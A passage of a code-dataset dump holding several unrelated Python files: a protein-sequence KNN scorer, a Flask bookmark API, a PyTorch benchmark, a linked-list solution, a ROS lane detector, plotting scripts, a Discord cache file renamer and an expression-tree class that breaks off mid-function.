file=open(r\"/root/DeepSUMO/src/libdata/blosum62.txt\",\"r\")\nfile = open(r\"libdata/blosum62.txt\",\"r\")\n# file = open(\"/data/zengyanru/DeepSumo/PretreatData/Result/blosum62.txt\", \"r\")\nfile = file.readlines()\nheader_l = file[0].strip().split(\"\\t\")\n# print(header_l)\nfor i in range(len(file) - 1):\n i += 1\n li = file[i].strip().split(\"\\t\")\n for j in range(len(header_l)):\n key1 = li[0] + header_l[j]\n blosum62_matrix[key1] = li[j + 1]\n\n\ndef blosum62(_list1, _list2):\n score_def = 0\n for i in range(len(_list1)):\n score_def += int(blosum62_matrix[str(_list1[i]) + str(_list2[i])])\n return score_def\n\n\ndef get_rate(_line, _positive_line, _negative_line, avg2):\n positive_score_list = []\n negative_score_list = []\n if _line + \"\\n\" in _positive_line:\n _positive_line.remove(_line + \"\\n\")\n elif _line + \"\\n\" in _negative_line:\n _negative_line.remove(_line + \"\\n\")\n # print(negative_score_list)\n else:\n pass\n for positive_line in _positive_line:\n positive_line = positive_line.strip()[30 - int(avg2):37 + int(avg2)]\n score = blosum62(_line, positive_line)\n score1 = [score, \"pos\"]\n positive_score_list.append(score1)\n # if str(line) in positive_scores_dict:\n # positive_scores_dict[str(_line)].update({'positive_score_list':positive_score_list})\n # else:\n # positive_scores_dict.update({str(line):{'positive_score_list':positive_score_list}})\n for negative_line in _negative_line:\n negative_line = negative_line.strip()[30 - int(avg2):37 + int(avg2)]\n score = blosum62(_line, negative_line)\n score1 = [score, \"neg\"]\n negative_score_list.append(score1)\n # if str(line) in positive_scores_dict:\n # positive_scores_dict[str(line)].update({'negative_score_list':negative_score_list})\n # else:\n # positive_scores_dict.update({str(line):{'negative_score_list':negative_score_list}})\n\n # 1.1 topk rate\n positive_rate_list = []\n for i in range(30): #\n p = (i + 1) / 100 # used to be i/100, but it will lead to zero division if the sample size is less than 100!\n np_sum = int(len(_positive_line) * p)\n if np_sum == 0:\n np_sum = 1\n # np_sum = np.ceil(len(_positive_line) * p) # in case number of positive seq less than 100\n\n # print(\"type(positive_score_list)\")\n # print(type(positive_score_list))\n # print(positive_score_list)\n\n positive_score_list.sort(reverse=True)\n negative_score_list.sort(reverse=True)\n\n two_scores_list = positive_score_list + negative_score_list\n # print(\"type(positive_score_list)\")\n # print(type(positive_score_list))\n # print(list(positive_score_list))\n # print(type(list(positive_score_list)))\n two_scores_list.sort(reverse=True)\n split_score = two_scores_list[np_sum - 1]\n posorneg = split_score[1]\n # print(\"np_sum\")\n # print(np_sum)\n # print(\"two_scores_list\")\n # print(two_scores_list)\n # print(\"split_score\")\n # print(split_score)\n # 求出positive-rate\n if posorneg == \"pos\":\n positive_num = positive_score_list.index(split_score)\n # print(\" positive_num\")\n # print( positive_num)\n else:\n positive_num = np_sum - negative_score_list.index(split_score)\n # print(\" positive_num\")\n # print( positive_num)\n positive_rate = positive_num / np_sum\n positive_rate_list.append(positive_rate)\n # print(\"positive_rate_list\")\n # print(positive_rate_list)\n # positive_scores_dict.update({str(line):{'positive_rate_list':positive_rate_list}})\n return positive_rate_list\n\n\ndef KNN_code(aa_line, _positive_line, _negative_line, avg2):\n pool = Pool(20)\n\n data_list = []\n X_list = []\n sample = len(_positive_line)\n for line in aa_line:\n line = line.strip()\n line = line[30 - int(avg2):30 + 7 + int(\n avg2)] # here 7 and the 7 in function \"get_rate\" should be changed if we change the matching length\n data_list.append(\n pool.apply_async(get_rate, args=(line, _positive_line, _negative_line[0:sample], avg2))) # [0:sample]\n\n for result in data_list:\n # print(result.get())\n X_list.append(result.get())\n pool.close()\n pool.join()\n return np.array(X_list)\n\n\ndef get_score_rate(_line, _positive_line):\n # print(len(_positive_line))\n if _line + \"\\n\" in _positive_line:\n _positive_line.remove(_line + \"\\n\")\n\n # print(len(_positive_line))\n positive_score_list = []\n for positive_line in _positive_line:\n positive_line = positive_line.strip()\n score = blosum62(_line, positive_line)\n positive_score_list.append(score)\n # 1.1 计算topk score\n positive_rate_list = []\n positive_score_sum = 0\n for i in range(30): # 改\n p = (i + 1) / 100 # 改\n np_sum = int(len(_positive_line) * p)\n # print(positive_score_list)\n\n # print(\"pos\")\n\n positive_score_list.sort(reverse=True)\n # print(positive_score_list)\n for i in range(np_sum):\n positive_score_sum += positive_score_list[i]\n positive_rate = positive_score_sum / np_sum\n positive_rate_list.append(positive_rate)\n # print(\"positive_rate_list\")\n # print(positive_rate_list)\n # positive_scores_dict.update({str(line):{'positive_rate_list':positive_rate_list}})\n return positive_rate_list\n\n\ndef KNN_positive_code(aa_line, _positive_line):\n pool = Pool(30)\n data_list = []\n X_list = []\n sample = len(_positive_line)\n for line in aa_line:\n line = line.strip()\n data_list.append(pool.apply_async(get_score_rate, args=(line, _positive_line)))\n\n for result in data_list:\n # print(result.get())\n X_list.append(result.get())\n return np.array(X_list)","sub_path":"KNNBinding.py","file_name":"KNNBinding.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"181629434","text":"from flask import Blueprint, jsonify, request, Response\nfrom app.models.link import Category\nfrom app.models.link import Link, Alarm\nfrom app.models.members import Member\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlretrieve\nfrom app.views.utils import random_char, deEmojify\nimport subprocess\n\n\nbp = Blueprint('v1_link', __name__, url_prefix='/v1/link')\n\n\n@bp.route('/get/categories', methods=['GET'])\ndef getCategories():\n\n member = Member.getUserId(request.args[\"username\"])\n\n categories = Category.getCategories(member.id)\n\n return jsonify({\n \"categories\": Category.encodes(categories)\n })\n\n\n@bp.route(\"/create/category\", methods=[\"POST\"])\ndef createCategory():\n\n member = Member.getUserId(request.json[\"username\"])\n c_obj = {\n \"user_id\": member.id,\n \"color\": request.json[\"color\"],\n \"name\": request.json[\"name\"]\n }\n\n category = Category(c_obj)\n Category.save(category)\n\n return jsonify({\n \"category\": Category.encode(category)\n })\n\n\n@bp.route(\"/update/category\", methods=[\"POST\"])\ndef updateCategory():\n\n category = Category.update(int(request.json[\"id\"]), request.json[\n \"name\"], request.json[\"color\"])\n\n return jsonify({\n \"category\": Category.encode(category)\n })\n\n\n@bp.route(\"/delete/category\", methods=[\"POST\"])\ndef deleteCategory():\n\n category = Category.delete(int(request.json[\"id\"]))\n\n return jsonify({\n \"category\": Category.encode(category)\n })\n\n\n@bp.route(\"/delete/link\", methods=[\"POST\"])\ndef deleteLink():\n\n link = Link.delete(int(request.json[\"id\"]))\n\n return jsonify({\n \"link\": Link.encode(link)\n })\n\n\ndef parsingSite(url):\n domin = \"\"\n if url.startswith(\"http://\"):\n domain = url[7:].split(\"?\")[0].split(\"/\")[0]\n elif url.startswith(\"https://\"):\n domain = url[8:].split(\"?\")[0].split(\"/\")[0]\n else:\n url = \"http://\" + url\n domain = url[7:].split(\"?\")[0].split(\"/\")[0]\n\n response = requests.get(request.json[\"url\"])\n if response.ok:\n html = response.text\n html = html.replace(\"\\t\", \"\").replace(\"\\n\", \"\")\n\n soup = BeautifulSoup(html, \"html.parser\")\n\n try:\n title = soup.find(\"title\").get_text()\n except:\n title = domain\n\n try:\n html = deEmojify(html)\n innertext = soup.get_text()\n except:\n html = \"\"\n innertext = \"\"\n\n fav_filename = random_char(12) + \".jpg\"\n try:\n urlretrieve(\"https://www.google.com/s2/favicons?domain=\" +\n domain, \"/usr/src/images/\" + fav_filename)\n except:\n print(\"Here is local\")\n\n icon = \"https://lsapi.ggpark.kr/images/\" + fav_filename\n\n return html, innertext, title, icon, domain\n\n\n@bp.route(\"/update/link\", methods=[\"POST\"])\ndef updateLink():\n\n link = Link.get(request.json[\"id\"])\n\n if \"url\" in request.json and link.url != request.json[\"url\"]:\n url = request.json[\"url\"]\n\n html, innertext, title, icon, domain = parsingSite(url)\n request.json[\"html\"] = html\n request.json[\"innertext\"] = innertext\n request.json[\"title\"] = title\n request.json[\"icon\"] = icon\n request.json[\"domain\"] = domain\n request.json[\"pdf_url\"] = \"\"\n\n try:\n link = Link.update(request.json)\n except:\n request.json[\"html\"] = \"\"\n request.json[\"innertext\"] = \"\"\n link = Link.update(request.json)\n\n return jsonify({\n \"success\": True,\n \"link\": Link.encode(link)\n })\n\n\n@bp.route(\"/create/link\", methods=[\"POST\"])\ndef createLink():\n\n member = Member.getUserId(request.json[\"username\"])\n\n try:\n url = request.json[\"url\"]\n html, innertext, title, icon, domain = parsingSite(url)\n category_id = request.json[\"category_id\"]\n description = request.json[\"description\"]\n\n l_obj = {\n \"user_id\": member.id,\n \"url\": url,\n \"icon\": icon,\n \"title\": title,\n \"description\": description,\n \"html\": html,\n \"category_id\": category_id,\n \"domain\": domain,\n \"innertext\": innertext\n }\n\n try:\n link = Link(l_obj)\n Link.save(link)\n except:\n l_obj[\"html\"] = \"\"\n l_obj[\"innertext\"] = \"\"\n link = Link(l_obj)\n Link.save(link)\n\n return jsonify({\n \"success\": True,\n \"link\": Link.encode(link)\n })\n except:\n return jsonify({\n \"success\": False\n })\n\n\n@bp.route(\"/get/links\", methods=[\"GET\"])\ndef getLinks():\n\n member = Member.getUserId(request.args[\"username\"])\n\n links = Link.getLinks(request.args, member.id)\n\n return jsonify({\"links\": Link.encodes(links)})\n\n\n@bp.route(\"/get/link\")\ndef getLink():\n\n return jsonify({\"link\": Link.getOne(int(request.args[\"id\"]))})\n\n\n@bp.route(\"/set/pdf\")\ndef setPDF():\n link = Link.get(int(request.args[\"id\"]))\n\n if link.pdf_url and len(link.pdf_url) > 0:\n return jsonify({\"pdf_url\": link.pdf_url})\n else:\n subprocess.call(['xvfb-run', 'wkhtmltopdf', link.url, str(link.id) + '.pdf'],\n cwd=\"/usr/src/images/\")\n # subprocess.call(['wkhtmltopdf', link.url, str(link.id) + '.pdf'],\n # cwd=\"/Users/mediwhale/Downloads/100samples/\")\n\n pdf_url = \"https://lsapi.ggpark.kr/images/\" + str(link.id) + '.pdf'\n\n Link.update({\"id\": link.id, \"pdf_url\": pdf_url})\n\n return jsonify({\"pdf_url\": pdf_url})\n\n\n@bp.route(\"/update/alarm\", methods=[\"POST\"])\ndef updateAlarm():\n alarm_id = int(request.json[\"id\"])\n\n display_time = request.json[\"display_time\"]\n alarm_time = display_time[0:16]\n\n if alarm_id == -1:\n a_json = {\n \"link_id\": int(request.json[\"link_id\"]),\n \"display_time\": display_time,\n \"local_timezone\": int(request.json[\"local_timezone\"]),\n \"alarm_time\": alarm_time\n }\n\n alarm = Alarm(a_json)\n Alarm.save(alarm)\n\n else:\n alarm = Alarm.get(alarm_id)\n\n a_json = {\n \"link_id\": int(request.json[\"link_id\"]),\n \"display_time\": display_time,\n \"local_timezone\": int(request.json[\"local_timezone\"]),\n \"alarm_time\": alarm_time,\n \"deleted_at\": None\n }\n\n Alarm.update(alarm_id, a_json)\n\n return jsonify({\"success\": True})\n\n\n@bp.route(\"/delete/alarm\", methods=[\"POST\"])\ndef deleteAlarm():\n\n alarm = Alarm.delete(int(request.json[\"id\"]))\n\n return jsonify({\n \"success\": True\n })\n","sub_path":"LinkStorageAPI/app/views/v1/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"303230918","text":"import json\n\nimport torch\n\nfrom models.MobileNets import mobilenet_v2\nfrom models.resnet import resnet50\n\n\nfrom models.models import Resnet, ResnetDilated\n#\n# n1 = resnet50()\n# n11 = Resnet(n1)\n\nn2 = mobilenet_v2()\ndevice = \"cpu\"\nif torch.cuda.is_available():\n\tdevice = \"cuda\"\nprint(device)\nn2.to(device)\n# n22 = mnet(n2)\n#\n# data = torch.zeros(1, 3, 600, 454)\n#\n# o1 = n11(data)\n# o2 = n22(data)\n#\n# [print(_.size()) for _ in o1]\n# print(\"==============================================================\")\n# [print(_.size()) for _ in o2]\n#\n#\n# print(n2)\n\n# dummy_input = torch.zeros(1, 3, 224, 224)\n# torch.onnx.export(n2, dummy_input,\"export.onnx\", verbose=True, )\nbatch_sizes = [16, 32, 64, 128, 256]\n\nfor bs in batch_sizes:\n\tdummy = torch.randn(bs, 3, 224, 224).to(device)\n\n\t# warm up\n\timport time\n\tstart = time.time()\n\twarm_up_runs = 50\n\tfor i in range(warm_up_runs):\n\t\tout = n2(dummy)\n\tend = time.time()\n\tprint(\"%d duration %.4f \" % (bs, (end - start) / warm_up_runs))\n\n\n\tstart = time.time()\n\twarm_up_runs = 200\n\tfor i in range(warm_up_runs):\n\t\tout = n2(dummy)\n\tend = time.time()\n\tprint(\"%d duration %.4f \" % (bs, (end - start) / warm_up_runs))\n\tprint(\"======================================================================\")\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"349725102","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @Time:2020/10/7 19:59\n# @Author:JiahangGu\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def detectCycle(self, head: ListNode) -> ListNode:\n \"\"\"\n 由于不能使用额外空间,所以考虑双指针解法。首先对问题进行分析,如果存在环,则快慢指针一定会重合,如果不重合则无环。\n 当重合时,快慢指针走的步数差为2*x-x=x刚好是环的长度(简单追击问题),知道环的长度之后,对于双指针来说,如果要想\n 找到入口,则快慢指针差为环的长度。所以让快指针先走环长的步数,这样在快指针走到入口时,慢指针刚好也到入口。\n 上述依然后优化的地方,因为慢指针刚好走了x步,所以slow和head相差x个结点,而不用fast从head重新走。\n 实现过程需要注意下对不存在环的判定,如果fast都没有移动过或者移动过但是不等于slow,则不存在环。\n :param head:\n :return:\n \"\"\"\n fast = head\n slow = head\n step = 0\n while fast and fast.next:\n step += 1\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if fast != slow or step == 0:\n return None\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return fast\n","sub_path":"All Problems/142-linked-list-cycle-ii.py","file_name":"142-linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"117643213","text":"#Line Detection\n\n#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Int16MultiArray\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv2\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport time\n\ncarPositionPublisher = None\ntimestamp = time.time()\n\n\n\n\n#Distance from point (x_0,y_0) to a line by = -ax - c is given by:\n#https://en.wikipedia.org/wiki/Distance_from_a_point_to_a_line#Line_defined_by_an_equation\n#NOTE: The values b and m in this implementation refer to the standard line representation y=m*x +b\nclass LineModel():\n\n def __init__(self, point1, point2):\n\n #We can now calculate the slope m from the points. From that we get a\n self.m = (point1[1]-point2[1])/(point1[0]-point2[0])\n self.a = -self.m\n\n #We can now rearrange the formula to c= -ax -by and insert one of our points to calculate c.\n self.c = -self.a*point1[0] -point1[1]\n #NOTE: This b is not the same as in the formula! we ignore the b in the formula becuase it is 1. This b here is the offset of the function\n self.b = -self.c\n\n #Now we prepare the denominators of the formula's fraction for later use (it only depends on constants)\n self.denominatorPoints = pow(self.a,2)+1\n self.denominatorDist = math.sqrt(self.denominatorPoints)\n\n def dist(self, point):\n #Here we just apply the formula as found in the link above\n return abs(self.a*point[0] + point[1] + self.c)/self.denominatorDist\n\n def closestPoint(self, point):\n xVal = (point[0] - self.a*point[1] - self.a*self.c)/self.denominatorPoints\n yVal = (-self.a*point[0] + (self.a**2)*point[1] - self.c)/self.denominatorPoints\n return np.array([xVal, yVal])\n\n def funcValue(self, xValue):\n return (xValue*self.m +self.b)\n\n def antiFuncValue(self, yValue):\n return ((yValue - self.b)/self.m)\n\n def intersection(self, otherLine):\n xVal = (self.b-otherLine.b)/(otherLine.m-self.m)\n yVal = self.funcValue(xVal)\n return np.array([xVal, yVal])\n\ndef getOffset(img):\n midLine = img[-1]\n midWhites = np.argwhere(midLine)\n together = 0\n for i in range(0,len(midWhites)):\n if i>0 and midWhites[i][0]==midWhites[i-1][0]+1:\n together += 1\n if together>10:\n return (320 + 90 - midWhites[i - together//2][0])\n else:\n together = 0\n\n\n return None\n\ndef callback(data):\n global timestamp\n global carPositionPublisher\n\n time0 = time.time()\n bridge = CvBridge()\n try:\n cv_image = bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n height = 480\n width = 640\n trapezBreiteOben = 200\n distSideTop = (width - trapezBreiteOben)/2\n trapezBreiteUnten = 200\n distSideBottom = (width - trapezBreiteUnten)/2\n\n #OL , OR , UL , UR\n src = np.float32([[distSideTop,280],[width-distSideTop,280],[distSideBottom,480],[width-distSideBottom,480]])\n dst = np.float32([[0,0],[200,0],[0, 200],[200,200]])\n\n gray_img = cv2.cvtColor(cv_image, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(gray_img, 160, 255, cv2.THRESH_BINARY)\n\n offset = getOffset(thresh)\n print(\"offset: {}\".format(offset))\n carPositionPublisher.publish(str(offset))\n\ndef listener():\n global carPositionPublisher\n rospy.init_node(\"listener\", anonymous=True)\n\n carPositionPublisher = rospy.Publisher(\"Offset\", String, queue_size=10)\n rospy.Subscriber(\"/camera/color/image_raw\", Image, callback)\n rospy.spin()\n\nif __name__=='__main__':\n listener()\n","sub_path":"tasks_wise1819/ub09/line_detection3.py","file_name":"line_detection3.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406321708","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport scipy.stats as st\nimport glob\nimport re\n\nbenchmark_dir1 = \"10000000_nodes_500000000_edges/\"\n\nbenchmark_dir2 = \"500000_nodes_500000000_edges/\"\nbenchmark_dir3 = \"20000000_nodes_500000000_edges/\"\n\n\nbenchmark_dir = benchmark_dir1\nconfidence_value = 0.95\n\n# Returns point estimate, begin and end of confidence interval.\ndef confidenceInterval(data, prob_interval) :\n # Note: the probability of the confidence interval starting at k and -k -th data point\n # is 1 - 2 * binom(k, len(data), 0.5)\n\n p = np.ones(len(data)) / len(data)\n distro = st.rv_discrete(values = (data, p))\n point = distro.median()\n interval = distro.interval(prob_interval)\n return point, interval[0], interval[1]\n\n\ndef plot_mean_and_CI(x, mean, lb, ub, color_mean, color_shading, linewidth=1, label=None):\n # plot the shaded range of the confidence intervals\n plt.fill_between(x, ub, lb,\n color=color_shading, alpha=.5)\n # plot the mean on top\n plt.plot(x, mean, color_mean, linewidth=linewidth, label=label,marker='o')\n\ndef getComAvoidingSamples(filename):\n file = open(benchmark_dir + \"cc_avoiding/\"+ filename, 'r')\n samples = [float(x.split(\",\")[5]) for x in file.readlines() if x.startswith(\"/cluster\")]\n file.close()\n return samples\n\n\ndef getSamples(col_name, filename, n):\n try:\n if(col_name == \"Total compute\"):\n values_scatter = np.array(getSamples(\"Scatter\", filename, n))\n values_compute = np.array(getSamples(\"Compute\", filename, n))\n values_reduce = np.array(getSamples(\"Reduce\", filename, n))\n return values_scatter + values_compute + values_reduce\n\n df = pd.read_csv(filename)\n data = df.values\n \n column_names = np.array([x.replace(\" \", \"\") for x in df.columns.values])\n column_names = np.delete(column_names, np.argwhere(column_names == 'Countnodes'))\n col_id = np.where(column_names == col_name.replace(\" \", \"\"))[0][0]\n values = np.max((data[:,col_id]).reshape((-1,n)), axis=1)\n #print(values)\n return values\n except:\n print(\"failed for \" + filename)\n\ndef getMixedFilename(n, t):\n n_mpi = int(n/t)\n return \"n_\" + str(n_mpi) + \"_t_\" + str(t) + \".txt\"\n\ndef getMpiOnlyFilename(n):\n return \"mpi/mpi_\" + str(n) + \".log\"\n\n# setup plots\n\n\n\nfor benchmark_dir in [benchmark_dir1, benchmark_dir2, benchmark_dir3]:\n\tplt.rcParams.update({'font.size': 24})\n\tfig = plt.figure(figsize=(10, 10))\n\tlinewidth = 1\n\ttitles = [\"Total time\"]\n\n\t# plot mpi only\n\tplt.xlim(0,24)\n\tns = [1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,41,43,47]\n\tfor i, name in enumerate([\"Total compute\"]):\n\t data = np.array([confidenceInterval(getSamples(name, benchmark_dir + getMpiOnlyFilename(n), n), confidence_value) for n in ns])\n\t plot_mean_and_CI(ns, data[:,1], data[:,1], data[:,2], color_mean='#144ead', color_shading=\"#5790ed\", linewidth=linewidth, label=\"mpi only\")\n\t plt.title(titles[i])\n\t plt.xlabel(\"Number of cores\")\n\t plt.ylabel(\"Time [s]\")\n\n\t#GET OMP\n\tfile_omp = benchmark_dir + \"omp/omp_results.log\"\n\tdata = pd.read_csv(file_omp,sep=',').values\n\tu = []\n\tl = []\n\tto_plot = []\n\tprint(data[1:20,1])\n\t#ignore first\n\tfor i in range(0, 24): \n\t d,up,lw = confidenceInterval(data[i*20+1:i*20+21,2], 0.95)\n\t to_plot += [d]\n\t u += [up]\n\t l += [lw]\n\tplot_mean_and_CI([i for i in range(1,25)], to_plot, u, l,color_mean=\"red\", linewidth=linewidth, color_shading=\"#ff9372\", label=\"OMP\")\n\n\t# plot comm avoiding\n\tns = [i for i in range(1,25)]\n\tdata = np.array([confidenceInterval(getComAvoidingSamples('cc_'+ str(n) +'.txt'), confidence_value) for n in ns])\n\tplot_mean_and_CI(ns, data[:,0], data[:,1], data[:,2], color_mean='green', color_shading=\"#87D37C\", linewidth=linewidth, label=\"comm avoiding\")\n\n\n\tplt.xlabel(\"Number of cores\")\n\tplt.ylabel(\"Time [s]\")\n\tplt.ylim(bottom=0, top=45)\n\tplt.legend()\n\tfig.tight_layout()\n\n\tplt.savefig(benchmark_dir[0:5] + \"our_impl.eps\", format='eps', dpi=40)\n\tplt.figure()\n\n","sub_path":"report/plots/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"150005259","text":"import os\r\nfrom colorama import Fore, Back, Style\r\n\r\nprint(Fore.CYAN + \"Discord Cache Decrypter\")\r\nprint(Fore.WHITE + \"Coded by: Mert Kemal Atılgan\")\r\nprint(\"https://github.com/mertatilgan\\n\")\r\n\r\npath = input(\"Enter the location of Discord's Cache folder: \")\r\nfiles = os.listdir(path)\r\ni = 1\r\n\r\nfor file in files:\r\n os.rename(os.path.join(path, file), os.path.join(path, str(i)+'.png'))\r\n i = i+1\r\nprint(Fore.GREEN + \"[!] The operation is successful. Files in \"+path+\" location have been converted to .png format.\")\r\nprint(Style.RESET_ALL)\r\n","sub_path":"discord-cache-decryptor-english.py","file_name":"discord-cache-decryptor-english.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"367391252","text":"\n\n#calss header\nclass _SCAVENGER():\n\tdef __init__(self,): \n\t\tself.name = \"SCAVENGER\"\n\t\tself.definitions = [u'a bird or animal that feeds on dead animals that it has not killed itself']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_scavenger.py","file_name":"_scavenger.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"206702640","text":"#!python\nimport sys\nimport queue\nfrom collections import deque\nlower_string = \"abcdefghijklmnopqrstuvwxyz\"\n\n\nclass BinaryTreeNode(object):\n def __init__(self, data):\n \"\"\"\n Initialize the tree with user expression(algebraic expression)\n \n Args:\n data(str): string representation of math expression\n \"\"\"\n self.data = data\n self.right = None\n self.left = None\n # flag for operators to distinguish from operands\n self.operator = False\n \n\n def __repr__(self) -> str:\n \"\"\"Return a string representation of this parse tree node.\"\"\"\n return 'ParseTreeNode({!r})'.format(self.data)\n\n def is_leaf(self) -> bool:\n \"\"\"Return True if this node is a leaf(that is operand).\"\"\"\n return self.left is None and self.right is None\n\n\nclass BinaryExpressionTree(object):\n def __init__(self, expression: str = None):\n \"\"\"\n Initialize the tree with user expression(math expression)\n \n Args:\n expression(str): string representation of algebraic expression\n \"\"\"\n self.root = None\n self.size = 0\n\n if expression is not None:\n self.insert(expression)\n\n def __repr__(self) -> str:\n \"\"\"Return a string representation of this binary search tree.\"\"\"\n return 'BinarySearchTree({} nodes)'.format(self.size)\n\n def is_empty(self) -> bool:\n \"\"\"Return True if this binary search tree is empty (has no nodes).\"\"\"\n return self.root is None\n\n def insert(self, expression: str):\n \"\"\"\n Insert the postfix expression into the tree using stack\n \"\"\"\n postfix_exp = self.infix_to_postfix(expression)\n # if max size is 0, then it is infinite\n stack = deque()\n char = postfix_exp[0]\n # create a node for the first element of the expression\n node = BinaryTreeNode(char)\n # push it to stack\n stack.appendleft(node)\n\n # iterator for expression\n i = 1\n while len(stack) != 0:\n char = postfix_exp[i]\n # if char is float or int\n if '.' in char or char.isdigit():\n # create a node and push the node into the stack\n node = BinaryTreeNode(char)\n stack.appendleft(node)\n else:\n # create a parent(operator) node for operands\n operator_node = BinaryTreeNode(char)\n operator_node.operator = True\n # pop the last pushed item and create right_child\n right_child = stack.popleft()\n # pop item one before the last item and create left_child\n left_child = stack.popleft()\n # assign those as a child of the (parent)operator\n operator_node.right = right_child\n operator_node.left = left_child\n # push back the operator node(subtree) to the stack\n stack.appendleft(operator_node)\n # check if we reach last element in the expression\n # so we can define the root of the tree\n if len(stack) == 1 and i == len(postfix_exp) - 1:\n self.root = stack.popleft()\n # increment i\n i += 1\n self.size += 1\n print(f\"i is {i} in insert \")\n \n def items_in_order(self) -> list:\n \"\"\"Return an in-order list of all items in this binary search tree.\"\"\"\n items = []\n if not self.is_empty():\n # Traverse tree in-order from root, appending each node's item\n # item.append is uncalled function\n self._traverse_in_order_recursive(self.root, items.append)\n\n # self._traverse_in_order_iterative(self.root, items.append)\n # Return in-order list of all items in tree\n return items\n\n def _traverse_in_order_recursive(self, node, visit):\n \"\"\"\n Traverse this binary tree with recursive in-order traversal (DFS).\n Start at the given node and visit each node with the given function.\n Running time: O(n) we are visiting each node\n Memory usage: O(n) when node is visited we are adding new item to list\n \"\"\"\n\n if(node):\n # Traverse left subtree, if it exists\n self._traverse_in_order_recursive(node.left, visit)\n # Visit this node's data with given function\n visit(node.data)\n # Traverse right subtree, if it exists\n self._traverse_in_order_recursive(node.right, visit)\n\n def evaluate(self, node=None) -> float:\n \"\"\"\n Calculate this tree expression recursively\n\n Args:\n node(BinaryTreeNode): starts at the root node\n \"\"\"\n # initialize\n \n if node is None:\n node = self.root\n \n # empty tree\n if node is None:\n return 0\n\n # check if we are at the leaf, it means it is a operand\n if node.is_leaf():\n val = float(node.data)\n \n return val\n \n left_value = self.evaluate(node.left)\n right_value = self.evaluate(node.right)\n\n # addition\n if node.data == \"+\":\n \n return left_value + right_value\n # subtraction\n elif node.data == \"-\":\n return left_value - right_value\n # division\n elif node.data == \"/\":\n return left_value / right_value\n # multiplication\n elif node.data == \"*\":\n return left_value * right_value\n # power\n else:\n return left_value ** right_value\n\n def infix_to_postfix(self, infix_input: list) -> list:\n \"\"\"\n Converts infix expression to postfix.\n\n Args:\n infix_input(list): infix expression user entered\n \"\"\"\n\n # precedence order and associativity helps to determine which\n # expression is needs to be calculated first\n precedence_order = {'+': 0, '-': 0, '*': 1, '/': 1, '^': 2}\n associativity = {'+': \"LR\", '-': \"LR\", '*': \"LR\", '/': \"LR\", '^': \"RL\"}\n # clean the infix expression\n clean_infix = self._clean_input(infix_input)\n \n i = 0\n postfix = []\n operators = \"+-/*^\"\n stack = deque()\n while i < len(clean_infix):\n \n char = clean_infix[i]\n # print(f\"char: {char}\")\n # check if char is operator\n if char in operators:\n # check if the stack is empty or the top element is '('\n if len(stack) == 0 or stack[0] == '(':\n # just push the operator into stack\n stack.appendleft(char)\n i += 1\n # otherwise compare the curr char with top of the element\n else:\n # peek the top element\n top_element = stack[0]\n # check for precedence\n # if they have equal precedence\n if precedence_order[char] == precedence_order[top_element]:\n # check for associativity\n if associativity[char] == \"LR\":\n # pop the top of the stack and add to the postfix\n popped_element = stack.popleft()\n postfix.append(popped_element)\n # if associativity of char is Right to left\n elif associativity[char] == \"RL\":\n # push the new operator to the stack\n stack.appendleft(char)\n i += 1\n elif precedence_order[char] > precedence_order[top_element]:\n # push the char into stack\n stack.appendleft(char)\n i += 1\n elif precedence_order[char] < precedence_order[top_element]:\n # pop the top element\n popped_element = stack.popleft()\n postfix.append(popped_element)\n elif char == '(':\n # add it to the stack\n stack.appendleft(char)\n i += 1\n elif char == ')':\n top_element = stack[0]\n while top_element != '(':\n popped_element = stack.popleft()\n postfix.append(popped_element)\n # update the top element\n top_element = stack[0]\n # now we pop opening parenthases and discard it\n stack.popleft()\n i += 1\n # char is operand\n else:\n postfix.append(char)\n i += 1\n # print(postfix)\n # print(f\"stack: {stack}\")\n \n # empty the stack\n if len(stack) > 0:\n for i in range(len(stack)):\n postfix.append(stack.popleft())\n # while len(stack) > 0:\n # postfix.append(stack.popleft())\n\n return postfix\n \n def _clean_input(self, infix_exp: str) -> list:\n \"\"\"\n Clean and determine if the input expression user provided can be\n calculated.\n\n Args:\n infix_exp(str): raw infix expression from user\n \n Return:\n clean_format(list): cleaned expression in a list form. Using list\n helps to support more than 1 digit numbers in the tree.\n \"\"\"\n operators = 